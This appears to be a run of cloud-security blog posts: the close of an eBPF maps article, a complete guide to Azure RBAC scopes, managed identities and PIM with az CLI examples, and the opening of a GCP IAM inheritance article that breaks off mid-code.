When Cilium’s CT map fills up, it starts evicting the least recently used connections — not returning an error. You see connection resets, not a tool alert. Check map utilisation (bpftool map dump id X | grep -c key) against max_entries on nodes with high connection rates.

Ring buffer drops don’t stop the tool — they create gaps
When Falco’s ring buffer fills up, events are dropped. Falco keeps running. The rule engine keeps processing. But you have gaps in your syscall visibility. Monitor Dropped events in Falco’s stats and size the ring buffer accordingly.

Map memory is invisible to standard monitoring
200–400MB of kernel-locked memory on a Cilium + Falco node doesn’t appear in top, container memory metrics, or memory pressure alerts. Size eBPF-heavy nodes with this in mind and add explicit map memory monitoring via bpftool.

Tools that don’t pin their maps lose state on restart
A Cilium restart with pinned maps = zero-disruption connection tracking. A tool without pinning = all tracked state rebuilt from scratch. This matters for connection tracking tools and any tool maintaining process lineage.

perf_event_array on kernel 5.8+ is the old way
Older eBPF tools use per-CPU perf_event_array for event streaming. Ring buffer is strictly better — single allocation, lower overhead, simpler consumption. If you’re running a tool that still uses perf_event_array on a 5.8+ kernel, it’s using a legacy path.


Key Takeaways

  • eBPF programs are stateless — maps are where all state lives, between invocations and between kernel and userspace
  • Every production eBPF tool (Cilium, Falco, Tetragon, Datadog NPM) is a map-based architecture — bpftool map list shows you what it’s actually holding
  • Per-CPU maps eliminate write contention for high-frequency counters; the tool aggregates per-CPU values at export time
  • LRU maps handle unbounded key spaces (IPs, PIDs, connections) without hard errors when full — but eviction is silent, so size generously
  • Ring buffer (kernel 5.8+) is the correct event streaming primitive — Falco and Tetragon both use it
  • Map memory is kernel-locked and invisible to standard memory metrics — account for it explicitly on eBPF-heavy nodes
  • Pinned maps survive restarts; Cilium uses this for zero-disruption connection tracking through upgrades

What’s Next

You know what program types run in the kernel, and you know how they hold state.

But there’s a problem anyone running eBPF-based tools eventually runs into: a tool works on one kernel version and breaks on the next. Struct layouts shift between patch versions. Field offsets move. EP06 covers CO-RE (Compile Once, Run Everywhere) and libbpf, the mechanism that makes tools like Cilium and Falco survive your node upgrades without recompilation, and why kernel version compatibility is a solved problem for any tool built on this toolchain.

Azure RBAC Explained: Management Groups, Subscriptions, and Scope

Reading Time: 11 minutes

Meta Description: Understand Azure RBAC scopes across management groups, subscriptions, and resources — assign roles at the right level without over-provisioning access.


TL;DR

  • Entra ID and Azure RBAC are two separate authorization planes — Entra ID roles control the identity system; RBAC roles control Azure resources. Global Administrator doesn’t grant VM access.
  • Azure RBAC role assignments inherit downward through the hierarchy: Management Group → Subscription → Resource Group → Resource
  • Use managed identities for all Azure-hosted workloads — system-assigned for one-to-one resource binding, user-assigned for shared access across multiple resources
  • Contributor is the right role for most service identities — full resource management without the ability to modify RBAC assignments
  • The Actions vs DataActions split means you can audit management access and data access independently — an incomplete audit checks only one
  • PIM (Privileged Identity Management) should govern privileged roles in both planes: nobody should permanently hold Global Admin (Entra ID) or Subscription Owner (Azure RBAC)

The Big Picture

         Azure: Two Separate Authorization Planes
─────────────────────────────────────────────────────────
  Entra ID (Identity Plane)      Azure RBAC (Resource Plane)
  ─────────────────────────      ───────────────────────────
  Controls:                      Controls:
  · Users, groups, apps          · Azure resources
  · Tenant settings              · Management groups
  · App registrations            · Subscriptions
  · Conditional access           · Resource groups
                                 · Individual resources

  Roles (examples):              Scope hierarchy:
  · Global Administrator         Management Group
  · User Administrator             └─ Subscription
  · Security Reader                     └─ Resource Group
  · Application Administrator                └─ Resource

  Scope: tenant-wide             Role assignment at any level
                                 inherits down to all nodes below

  Both planes use Entra ID identities.
  Authorization in each plane is completely independent.
  Global Admin ≠ Subscription Owner.

Azure RBAC scopes determine how far a role assignment reaches — and the blast radius of a misconfiguration scales directly with how high in the hierarchy it sits.


Introduction

Azure RBAC scopes define where a role assignment applies and everything it inherits. A role at the Management Group level touches every subscription, every resource group, and every resource across your entire Azure estate. A role at the resource level touches only that resource. Understanding scope before making any assignment is the difference between “access for this storage account” and “access for your entire org.”

When I first worked seriously in Azure environments, I had a mental model carried over from Active Directory administration. Users, groups, directory roles — I knew how that worked. I assumed Azure’s IAM would be an extension of the same system, just with cloud resources bolted on.

That assumption got me into trouble within the first week.

I was trying to understand why an engineer had Global Administrator access in Entra ID but couldn’t see the resources in a Subscription. In Active Directory terms, if you’re a Domain Admin, you can see everything. In Azure, it doesn’t work that way.

Entra ID roles and Azure RBAC roles are two different systems. Global Administrator is an Entra ID role — it controls who can manage the identity plane: create users, manage app registrations, configure tenant settings. It has nothing to do with Azure resources like virtual machines, storage accounts, or Kubernetes clusters. Those are governed by Azure RBAC, which is an entirely separate authorization system.

I spent two hours trying to understand why a Global Admin couldn’t list VMs before someone explained this. I’m putting it at the top of this episode so you don’t lose those two hours.


Entra ID vs Azure RBAC — The Two Separate Planes

| | Entra ID | Azure RBAC |
|---|---|---|
| Controls access to | Entra ID itself: users, groups, apps, tenant settings | Azure resources: VMs, storage, databases, subscriptions |
| Role types | Entra ID directory roles | Azure resource roles |
| Example roles | Global Admin, User Admin, Security Reader | Owner, Contributor, Storage Blob Data Reader |
| Scope | Tenant-wide | Management group → Subscription → Resource Group → Resource |
| Managed via | Entra ID admin center | Azure portal / ARM / Azure CLI |

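A user can be Global Administrator, the highest Entra ID role, and have zero access to Azure resources unless explicitly assigned an Azure RBAC role. (The one bridge is deliberate: a Global Administrator can elevate themselves to User Access Administrator at root scope, but that is an explicit, logged action, not implicit access.) And vice versa: a user with Subscription Owner (highest Azure RBAC role) has no ability to manage Entra ID user accounts without an Entra ID role assignment.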

These are not the same system. They’re connected — both use Entra ID identities as principals — but authorization in each plane is independent.


The Azure Resource Hierarchy

Azure RBAC role assignments can be made at any level of the resource hierarchy, and they inherit downward:

Tenant (Entra ID)
  └── Management Group  (policy and RBAC inheritance across subscriptions)
        └── Management Group  (nested, up to 6 levels)
              └── Subscription  (billing and resource boundary)
                    └── Resource Group  (logical container for resources)
                          └── Resource  (VM, storage account, key vault, AKS cluster...)

A role assigned at the Subscription level applies to every resource group and resource in that subscription. A role at the Management Group level applies to every subscription beneath it.

The blast radius of a misconfiguration scales with how high in the hierarchy it sits. Owner assigned at the subscription level is contained to that subscription. Contributor assigned at the root management group touches your entire Azure estate.

# View management group hierarchy
az account management-group list --output table

# List subscriptions
az account list --output table

# View all role assignments at a scope — start here in any audit
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --include-inherited \
  --output table
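For the subscription, resource group, and resource levels, inheritance follows the resource ID path, so it can be sketched as a prefix check. The function name below is hypothetical, and the sketch deliberately leaves out management groups: their IDs are not path prefixes of subscription IDs, so resolving them needs a hierarchy lookup.

```python
def assignment_applies(assignment_scope: str, resource_id: str) -> bool:
    """True if a role assigned at assignment_scope reaches resource_id."""
    scope = assignment_scope.rstrip("/").lower()
    target = resource_id.rstrip("/").lower()
    # An assignment applies at its own scope and at every scope nested below it.
    return target == scope or target.startswith(scope + "/")


sub = "/subscriptions/SUB_ID"
rg = sub + "/resourceGroups/rg-prod"
store = rg + "/providers/Microsoft.Storage/storageAccounts/prodstore"

print(assignment_applies(sub, store))  # True: subscription reaches the resource
print(assignment_applies(rg, store))   # True: resource group reaches the resource
print(assignment_applies(store, rg))   # False: inheritance never flows upward
```

The same check explains the audit output: every row whose scope is a prefix of the resource you care about is an effective grant on that resource.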

Principal Types in Azure RBAC

| Type | What It Is | Best For |
|---|---|---|
| User | Entra ID user account | Human access |
| Group | Entra ID security group | Team-based access |
| Service Principal | App registration with credentials (secret or cert) | External systems, apps with their own identity |
| Managed Identity | Credential-less identity for Azure-hosted workloads | Everything running in Azure |

Managed Identities — The Right Model for Workloads

Managed identities are Azure’s answer to AWS instance profiles and GCP service accounts attached to compute. Azure manages the entire credential lifecycle — tokens are issued automatically, there’s nothing to create, rotate, or revoke manually.

System-assigned managed identity is tied to a specific Azure resource. When the resource is deleted, the identity is deleted. One-to-one, no sharing.

# Enable system-assigned managed identity on a VM
az vm identity assign \
  --name my-vm \
  --resource-group rg-prod

# Get the principal ID (needed to assign RBAC roles to it)
az vm show \
  --name my-vm \
  --resource-group rg-prod \
  --query identity.principalId \
  --output tsv

User-assigned managed identity is a standalone resource that can be attached to multiple Azure resources and persists independently. This is the right model when multiple services need the same access — instead of assigning the same RBAC roles to ten separate system-assigned identities, you create one user-assigned identity, grant it the roles, and attach it to all ten resources.

# Create a user-assigned managed identity
az identity create \
  --name app-backend-identity \
  --resource-group rg-identities

# Get its identifiers
az identity show \
  --name app-backend-identity \
  --resource-group rg-identities \
  --query '{principalId:principalId, clientId:clientId}'

# Attach to a VM
az vm identity assign \
  --name my-vm \
  --resource-group rg-prod \
  --identities /subscriptions/SUB/resourceGroups/rg-identities/providers/Microsoft.ManagedIdentity/userAssignedIdentities/app-backend-identity

Code running inside an Azure VM or App Service with a managed identity gets tokens from the platform’s local identity endpoint (IMDS on VMs), with no credential management required:

from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobServiceClient

# DefaultAzureCredential automatically picks up the managed identity in Azure
credential = DefaultAzureCredential()
client = BlobServiceClient(
    account_url="https://myaccount.blob.core.windows.net",
    credential=credential
)

The DefaultAzureCredential chain tries, in order: environment variables → workload identity → managed identity → developer tools (Visual Studio / VS Code, Azure CLI). In Azure-hosted services with no credential environment variables set, the managed identity path is used automatically. In local development, it falls through to the developer’s az login session.


Azure Role Definitions — Understanding Actions vs DataActions

A role definition specifies what actions it grants. Azure distinguishes two planes:

  • Actions: Control plane — managing the resource itself (create, delete, configure)
  • DataActions: Data plane — accessing data within the resource (read blob contents, get secrets)
  • NotActions / NotDataActions: Exceptions carved out from the grant

{
  "Name": "Storage Blob Data Reader",
  "IsCustom": false,
  "Actions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/read",
    "Microsoft.Storage/storageAccounts/blobServices/generateUserDelegationKey/action"
  ],
  "NotActions": [],
  "DataActions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read"
  ],
  "NotDataActions": [],
  "AssignableScopes": ["/"]
}

The control/data plane split matters in audits. An identity with Microsoft.Storage/storageAccounts/read (an Action) can see the storage account exists and view its properties. To actually read blob contents, it needs the DataAction Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read. These are separate grants. In an access audit, checking only Actions and missing DataActions is an incomplete picture.
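A small evaluator makes the two-plane check explicit. This is a sketch, not Azure's authorization engine: the function names are hypothetical, wildcard matching is approximated with fnmatch, and the Reader definition is abridged from the built-in role as an assumption.

```python
from fnmatch import fnmatchcase


def _matches(operation: str, patterns: list) -> bool:
    op = operation.lower()
    return any(fnmatchcase(op, p.lower()) for p in patterns)


def grants(role: dict, operation: str, data_plane: bool) -> bool:
    """Allowed if it matches the allow list and no carve-out, per plane."""
    allow = role["DataActions"] if data_plane else role["Actions"]
    deny = role["NotDataActions"] if data_plane else role["NotActions"]
    return _matches(operation, allow) and not _matches(operation, deny)


# Taken from the Storage Blob Data Reader definition shown above.
blob_reader = {
    "Actions": [
        "Microsoft.Storage/storageAccounts/blobServices/containers/read",
        "Microsoft.Storage/storageAccounts/blobServices/generateUserDelegationKey/action",
    ],
    "NotActions": [],
    "DataActions": ["Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read"],
    "NotDataActions": [],
}
# Abridged Reader role (assumption): control-plane read only, no data actions.
reader = {"Actions": ["*/read"], "NotActions": [], "DataActions": [], "NotDataActions": []}

READ_BLOB = "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read"
print(grants(blob_reader, READ_BLOB, data_plane=True))  # True
print(grants(reader, READ_BLOB, data_plane=True))       # False
print(grants(reader, "Microsoft.Storage/storageAccounts/read", data_plane=False))  # True
```

An audit loop that only calls this with data_plane=False would report Reader and Storage Blob Data Reader as nearly equivalent, which is exactly the blind spot described above.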

Built-in Roles Worth Understanding

| Role | Scope | What It Grants |
|---|---|---|
| Owner | Any | Full access + can manage RBAC assignments: the highest trust role |
| Contributor | Any | Full resource management, but cannot manage RBAC |
| Reader | Any | Read-only on all resources |
| User Access Administrator | Any | Can manage RBAC assignments, no resource access |
| Storage Blob Data Contributor | Storage | Read/write/delete blob data |
| Storage Blob Data Reader | Storage | Read blob data only |
| Key Vault Secrets Officer | Key Vault | Manage secrets, not keys or certificates |
| AcrPush / AcrPull | Container Registry | Push or pull images |

The gap between Owner and Contributor is important: Contributor can do everything to a resource except manage who has access to it. This is the right role for most service identities and automation — they need to manage resources, not manage permissions. If a compromised Contributor identity can’t modify RBAC assignments, it can’t grant itself or an attacker additional access.

Owner should be granted to people, not service identities, and only at the narrowest scope necessary.
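One way to check this rule in an audit is to filter exported assignments for service identities that can modify RBAC. The sketch below assumes rows shaped like the JSON from az role assignment list (principalType, roleDefinitionName, scope, principalName); the sample rows are invented, and the role set is a starting point rather than an exhaustive list.

```python
# Roles that can change who has access (not exhaustive; extend for your tenant).
RBAC_WRITE_ROLES = {"Owner", "User Access Administrator"}


def risky_service_assignments(assignments: list) -> list:
    """Return assignments where a service identity can modify RBAC."""
    return [
        a for a in assignments
        if a.get("principalType") == "ServicePrincipal"
        and a.get("roleDefinitionName") in RBAC_WRITE_ROLES
    ]


# Hypothetical sample rows for illustration only.
sample = [
    {"principalName": "app-backend-identity", "principalType": "ServicePrincipal",
     "roleDefinitionName": "Owner", "scope": "/subscriptions/SUB_ID"},
    {"principalName": "deploy-bot", "principalType": "ServicePrincipal",
     "roleDefinitionName": "Contributor", "scope": "/subscriptions/SUB_ID/resourceGroups/rg-dev"},
    {"principalName": "alice", "principalType": "User",
     "roleDefinitionName": "Owner", "scope": "/subscriptions/SUB_ID/resourceGroups/rg-dev"},
]

for row in risky_service_assignments(sample):
    print(row["principalName"], row["roleDefinitionName"], row["scope"])
# app-backend-identity Owner /subscriptions/SUB_ID
```

Managed identities also appear with principalType ServicePrincipal in assignment listings, so the same filter covers both kinds of workload identity.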

Custom Roles

cat > custom-app-storage.json << 'EOF'
{
  "Name": "App Storage Blob Reader",
  "IsCustom": true,
  "Description": "Read app blobs only — no container management, no key operations",
  "Actions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/read"
  ],
  "DataActions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read"
  ],
  "NotActions": [],
  "NotDataActions": [],
  "AssignableScopes": ["/subscriptions/SUB_ID"]
}
EOF

az role definition create --role-definition custom-app-storage.json

# Assign it — specifically to this storage account
az role assignment create \
  --assignee-object-id "$(az identity show --name app-backend-identity -g rg-identities --query principalId -o tsv)" \
  --assignee-principal-type ServicePrincipal \
  --role "App Storage Blob Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

Role Assignments — Where Access Is Actually Granted

The assignment brings everything together: principal + role + scope. This is the actual grant.

# Assign to a user (less common; prefer group assignments)
# USER_UPN is a placeholder for the user's sign-in name
az role assignment create \
  --assignee USER_UPN \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/prodstore

# Assign to a group (better — one assignment, maintained via group membership)
GROUP_ID=$(az ad group show --group "Backend-Team" --query id -o tsv)
az role assignment create \
  --assignee-object-id "$GROUP_ID" \
  --assignee-principal-type Group \
  --role "Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-dev

# Assign to a managed identity
MI_PRINCIPAL=$(az identity show --name app-backend-identity --resource-group rg-identities --query principalId -o tsv)
az role assignment create \
  --assignee-object-id "$MI_PRINCIPAL" \
  --assignee-principal-type ServicePrincipal \
  --role "Storage Blob Data Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

# Audit all assignments at a scope, including those inherited from parent scopes
az role assignment list \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod \
  --include-inherited \
  --output table

Group-based assignments are the right model for humans at scale. When an engineer joins the Backend team, they join the Entra ID group. Their access follows. When they leave, you remove them from the group or disable their account. You never need to hunt down individual role assignments.


Entra ID Roles — The Other Layer

Entra ID roles control the identity infrastructure itself. These are distinct from Azure RBAC roles and deserve separate treatment:

| Role | What It Controls |
|---|---|
| Global Administrator | Everything in the tenant: highest privilege |
| Privileged Role Administrator | Assign and remove Entra ID roles |
| User Administrator | Create and manage users and groups |
| Application Administrator | Register and manage app registrations |
| Security Administrator | Manage security features and read reports |
| Security Reader | Read-only on security features |

Global Administrator in Entra ID is one of the most powerful identities in a Microsoft environment. It can modify any user, any app registration, any conditional access policy. Combined with the fact that Entra ID is also the identity provider for Microsoft 365, a Global Admin compromise can extend far beyond Azure resources into email, Teams, SharePoint — the entire Microsoft 365 estate.

Nobody should hold Global Administrator as a permanent assignment. This is where Privileged Identity Management (PIM) matters.

Privileged Identity Management — Just-in-Time Elevated Access

PIM is Azure’s answer to the problem of permanent privileged role assignments. Instead of permanently holding Global Admin or Subscription Owner, users are made eligible for these roles. When they need elevated access, they activate it with a justification (and optionally an approval and MFA requirement). The access is time-limited — typically 8 hours — and automatically expires.

# List roles where the user is eligible (not permanently assigned)
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleEligibilitySchedules" \
  --query "value[?principalId=='USER_OBJECT_ID']"

# A user activates an eligible role (calls this themselves when needed)
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --body '{
    "action": "selfActivate",
    "principalId": "USER_OBJECT_ID",
    "roleDefinitionId": "ROLE_DEF_ID",
    "directoryScopeId": "/",
    "justification": "Investigating security alert in tenant audit logs",
    "scheduleInfo": {
      "startDateTime": "2026-04-16T00:00:00Z",
      "expiration": { "type": "AfterDuration", "duration": "PT8H" }
    }
  }'

PIM is the right model for any role that could be used to escalate privileges: Global Administrator, Subscription Owner, Privileged Role Administrator, User Access Administrator. Nobody should have these permanently assigned unless there’s a strong operational reason — and even then, the assignment should be reviewed quarterly.
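The time-limited part of an activation is simple arithmetic on the scheduleInfo fields. The sketch below is illustrative only: the function names are hypothetical, and the parser handles just the hour and minute forms of ISO 8601 durations such as PT8H, not the full grammar.

```python
import re
from datetime import datetime, timedelta, timezone

_DURATION = re.compile(r"^PT(?:(\d+)H)?(?:(\d+)M)?$")


def activation_expiry(start: str, duration: str) -> datetime:
    """Return when an activation that starts at `start` stops being valid."""
    match = _DURATION.match(duration)
    if match is None or not any(match.groups()):
        raise ValueError(f"unsupported duration: {duration}")
    hours, minutes = (int(g) if g else 0 for g in match.groups())
    start_dt = datetime.strptime(start, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return start_dt + timedelta(hours=hours, minutes=minutes)


def is_active(start: str, duration: str, now: datetime) -> bool:
    """True while `now` falls inside the activation window."""
    start_dt = datetime.strptime(start, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return start_dt <= now < activation_expiry(start, duration)


expiry = activation_expiry("2026-04-16T00:00:00Z", "PT8H")
print(expiry.isoformat())  # 2026-04-16T08:00:00+00:00

nine_am = datetime(2026, 4, 16, 9, 0, tzinfo=timezone.utc)
print(is_active("2026-04-16T00:00:00Z", "PT8H", nine_am))  # False
```

With the values from the request above, the elevated role is gone by 08:00 UTC whether or not anyone remembers to remove it.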

In one Azure environment I audited, I found 11 permanent Global Administrator assignments. The team thought this was normal because they’d all been made admins when the tenant was set up two years earlier and nobody had revisited it. Of the 11, three were former employees whose Entra ID accounts had been disabled — but the Global Admin role assignment was still there. Disabled users can’t use their accounts, but this is not a pattern you want to rely on.


Federated Identity for External Workloads

For GitHub Actions, Kubernetes workloads, and other external systems that need to call Azure APIs, federated credentials eliminate service principal secrets:

# Create an app registration
APP_ID=$(az ad app create --display-name "github-actions-deploy" --query appId -o tsv)
SP_ID=$(az ad sp create --id "$APP_ID" --query id -o tsv)

# Add a federated credential for a specific GitHub repo and branch
az ad app federated-credential create \
  --id "$APP_ID" \
  --parameters '{
    "name": "github-main-branch",
    "issuer": "https://token.actions.githubusercontent.com",
    "subject": "repo:my-org/my-repo:ref:refs/heads/main",
    "audiences": ["api://AzureADTokenExchange"]
  }'

# Grant the service principal an RBAC role
az role assignment create \
  --assignee-object-id "$SP_ID" \
  --assignee-principal-type ServicePrincipal \
  --role "Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod

GitHub Actions — no secrets stored in GitHub:

jobs:
  deploy:
    runs-on: ubuntu-latest   # a job needs a runner; ubuntu-latest is an assumed choice
    permissions:
      id-token: write   # required for OIDC token request
    steps:
      - uses: azure/login@v2
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
      - run: az storage blob upload --account-name prodstore ...

The client-id, tenant-id, and subscription-id values are not secrets — they’re identifiers. The actual authentication is the OIDC JWT from GitHub, verified against GitHub’s public keys, subject-matched against the configured condition (repo:my-org/my-repo:ref:refs/heads/main). If the repo or branch doesn’t match, the token exchange fails. If it matches, a short-lived Azure token is issued.
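The claim comparison at the heart of that exchange can be sketched as follows. This shows only the matching step, under the assumption that the token's signature has already been verified against the issuer's keys; the function name and the sample claim dicts are hypothetical.

```python
def token_matches(credential: dict, claims: dict) -> bool:
    """Compare verified token claims against a federated credential."""
    aud = claims.get("aud")
    # The aud claim may be a single string or a list of strings.
    audiences = [aud] if isinstance(aud, str) else list(aud or [])
    return (
        claims.get("iss") == credential["issuer"]
        and claims.get("sub") == credential["subject"]
        and any(a in credential["audiences"] for a in audiences)
    )


# Same values as the federated credential created above.
credential = {
    "issuer": "https://token.actions.githubusercontent.com",
    "subject": "repo:my-org/my-repo:ref:refs/heads/main",
    "audiences": ["api://AzureADTokenExchange"],
}

main_run = {
    "iss": "https://token.actions.githubusercontent.com",
    "sub": "repo:my-org/my-repo:ref:refs/heads/main",
    "aud": "api://AzureADTokenExchange",
}
# Hypothetical run from a different branch of the same repo.
feature_run = dict(main_run, sub="repo:my-org/my-repo:ref:refs/heads/feature-x")

print(token_matches(credential, main_run))     # True
print(token_matches(credential, feature_run))  # False
```

Because the subject is compared exactly, a workflow on any other branch or repo fails the exchange even though it can obtain a perfectly valid GitHub token.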


⚠ Production Gotchas

Global Admin ≠ Azure resource access
This trips up every team migrating from on-prem AD. Entra ID roles and Azure RBAC roles are independent systems. A Global Admin with no RBAC assignments cannot list VMs. Don’t assume directory privilege translates to resource access.

Permanent Global Admin assignments are a standing breach risk
In the environment I audited: 11 permanent Global Admins, three of them disabled accounts. Disabled accounts can’t authenticate, but relying on that is not a security control. PIM eligible assignments + regular access reviews is the right answer.

Owner on service identities lets compromised workloads modify RBAC
If a managed identity or service principal holds Owner, a compromised workload can grant additional permissions to itself or an attacker. Use Contributor for workloads — full resource management, no RBAC modification.

Checking only Actions misses data-plane access
An audit that enumerates role Actions and ignores DataActions will miss identities with read access to blob contents, Key Vault secrets, or database records. Both planes need to be in scope.

System-assigned identity is deleted with the resource
If you delete and recreate a VM using a system-assigned identity, the new identity has a different principal ID. RBAC assignments made to the old identity do not carry over and must be recreated. User-assigned identities persist independently; use them for workloads where the resource lifecycle is separate from the identity lifecycle.


Quick Reference

# Audit all role assignments at a subscription (including inherited)
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --include-inherited \
  --output table

# Find all Owner assignments at subscription scope
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --role Owner \
  --output table

# Get principal ID of a VM's managed identity
az vm show \
  --name my-vm \
  --resource-group rg-prod \
  --query identity.principalId \
  --output tsv

# View role definition — check Actions AND DataActions
az role definition list --name "Storage Blob Data Reader" --output json \
  | jq '.[0] | {Actions: .permissions[0].actions, DataActions: .permissions[0].dataActions}'

# List management group hierarchy
az account management-group list --output table

# Create user-assigned managed identity
az identity create --name app-identity --resource-group rg-identities

# Assign role to managed identity at resource scope
az role assignment create \
  --assignee-object-id "$(az identity show -n app-identity -g rg-identities --query principalId -o tsv)" \
  --assignee-principal-type ServicePrincipal \
  --role "Storage Blob Data Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/mystore

# Check PIM eligible roles for a user
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleEligibilitySchedules" \
  --query "value[?principalId=='USER_OBJECT_ID'].{role:roleDefinitionId,scope:directoryScopeId}"

Framework Alignment

Framework | Reference | What It Covers Here
CISSP | Domain 5: Identity and Access Management | Azure’s directory-centric model; managed identities and PIM are the primary IAM constructs
CISSP | Domain 3: Security Architecture | Entra ID spans Azure, M365, and third-party SaaS; scope boundaries determine the blast radius of a compromise
ISO 27001:2022 | 5.15 Access control | Azure RBAC role definitions and assignments implement access control policy
ISO 27001:2022 | 5.16 Identity management | Entra ID is the identity management platform: user lifecycle, group management, application registrations
ISO 27001:2022 | 8.2 Privileged access rights | PIM (Privileged Identity Management) directly implements JIT controls for privileged roles
ISO 27001:2022 | 5.18 Access rights | Role assignment scoping, managed identity provisioning, federated credential lifecycle
SOC 2 | CC6.1 | Managed identities and RBAC are the primary technical controls for CC6.1 in Azure-hosted environments
SOC 2 | CC6.3 | PIM activation expiry and access reviews directly satisfy time-bound access removal requirements

Key Takeaways

  • Entra ID and Azure RBAC are separate authorization planes — Entra ID roles control the identity system; RBAC roles control Azure resources. Global Administrator doesn’t grant VM access.
  • Use managed identities for all Azure-hosted workloads — system-assigned for one-to-one, user-assigned for shared identities across multiple resources
  • Contributor is the right role for most service identities — full resource management without RBAC modification ability
  • The control/data plane split (Actions vs DataActions) in role definitions means you can grant management access without data access or vice versa — use this
  • PIM should govern all Entra ID privileged roles and high-scope Azure roles — nobody should permanently hold Global Admin or Subscription Owner
  • Federated identity credentials replace service principal secrets for external workloads — no secrets stored in CI/CD systems

What’s Next

EP07 goes cross-cloud: workload identity federation — the shift away from static credentials entirely, with IRSA for EKS, GKE Workload Identity, AKS workload identity, and GitHub Actions-to-all-three-clouds patterns.

Next: OIDC Workload Identity — Eliminate Cloud Access Keys Entirely.


GCP IAM Policy Inheritance: How the Resource Hierarchy Controls Access

Reading Time: 11 minutes

Meta Description: Map how GCP resource hierarchy IAM inheritance works — design org-level policies that don’t accidentally grant access to resources lower in the tree.


TL;DR

  • GCP IAM bindings inherit downward — a binding at Organization or Folder level applies to every project and resource beneath it
  • Basic roles (viewer/editor/owner) are legacy constructs; use predefined or custom roles in production
  • Service account keys are a long-lived credential antipattern — use ADC, impersonation, or Workload Identity Federation instead
  • allAuthenticatedUsers bindings expose resources to any of 3 billion Google accounts — audit for these in every environment
  • iam.serviceAccounts.actAs is the GCP equivalent of AWS iam:PassRole — a direct privilege escalation vector
  • Conditional bindings with time-bound expiry eliminate “I’ll remember to remove this” as an operational pattern

The Big Picture

                GCP IAM Inheritance Model
─────────────────────────────────────────────────────────
Organization (company.com)
│
├─ IAM binding at Org level ──────────────────┐
│                                             │ inherits down
├── Folder: Production                        ▼
│   │                                 ALL nodes below
│   ├── Folder: Shared-Services
│   │       └── Project: infra-core
│   │               ├── GCS: config-bucket  ← affected
│   │               └── Secret Manager      ← affected
│   │
│   └── Project: prod-web-app
│           ├── GCS: prod-assets             ← affected
│           ├── Cloud SQL: prod-db           ← affected
│           └── BigQuery: analytics          ← affected
│
└── Folder: Development                      ← NOT affected by
        └── Project: dev-app                    Production binding

GCP resource hierarchy IAM inheritance is the mechanism that makes a single binding cascade through an entire estate. It’s also the reason high-level bindings carry far more blast radius than they appear to.


Introduction

GCP resource hierarchy IAM operates on one rule: bindings propagate downward. Grant access at the Organization level and it applies to every Folder, every Project, and every resource in your GCP estate. Grant it at a Folder and it applies to every Project below. This is by design — and it’s the reason IAM misconfigurations in GCP can have a blast radius that teams migrating from AWS don’t anticipate.

I once inherited a GCP environment where the previous team had taken what they thought was a shortcut. They had a folder called Production with twelve projects in it. Rather than grant developers access to each project individually, they bound roles/editor at the folder level. One binding, twelve projects, all covered. Fast.

When I audited what roles/editor on that folder actually meant, I found it gave every developer in that binding write access to Cloud SQL databases they’d never heard of, BigQuery datasets from other teams, Pub/Sub topics in shared services, and Cloud Storage buckets that held data exports. Not because anyone intended that. Because permissions in GCP flow downward through the hierarchy, and a broad role at a high level means a broad role everywhere below it.

The developer who made that binding understood “Editor means edit access.” They didn’t think through what “edit access at the folder level” means across twelve projects. This is the GCP IAM trap that catches teams coming from AWS: the hierarchy feels like an organizational convenience feature, not an access control mechanism. It’s both.


The Resource Hierarchy — Not Just Org Structure

GCP’s resource hierarchy is the backbone of its IAM model:

Organization  (e.g., company.com)
  └── Folder  (e.g., Production, Development, Shared-Services)
        └── Folder  (nested, optional — up to 10 levels)
              └── Project  (unit of resource ownership and billing)
                    └── Resource  (GCE instance, GCS bucket, Cloud SQL, BigQuery, etc.)

The critical rule: IAM bindings at any level inherit downward to every node below.

Org IAM binding:
  user:ALICE_EMAIL → roles/viewer (org-level)
    ↓ inherited by
  Folder: Production
    ↓ inherited by
  Project: prod-web-app
    ↓ inherited by
  GCS bucket "prod-assets"

Result: alice can list and read resources across the ENTIRE org,
        across every folder, every project, every resource.
        Even if none of those resources have a direct binding for alice.

roles/viewer at the org level sounds benign — it’s just read access. But read access to everything in the organization, including infrastructure configurations, customer data exports in GCS, BigQuery analytics, Cloud SQL connection details, and Kubernetes cluster configs. Not benign.

Before making any binding above the project level, trace it down. Ask two questions: what does this role grant, and am I comfortable with that grant applying to every project and resource below this node?
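
Tracing a binding down the tree can be modelled in a few lines. This is a minimal sketch, assuming a hypothetical hierarchy and hypothetical bindings held in plain dictionaries; it does not call any GCP API, and the node names and the effective_bindings helper are illustrative only.

```python
# Hypothetical hierarchy: child -> parent (None marks the organization root).
PARENT = {
    "org/company.com": None,
    "folder/Production": "org/company.com",
    "folder/Development": "org/company.com",
    "project/prod-web-app": "folder/Production",
    "project/dev-app": "folder/Development",
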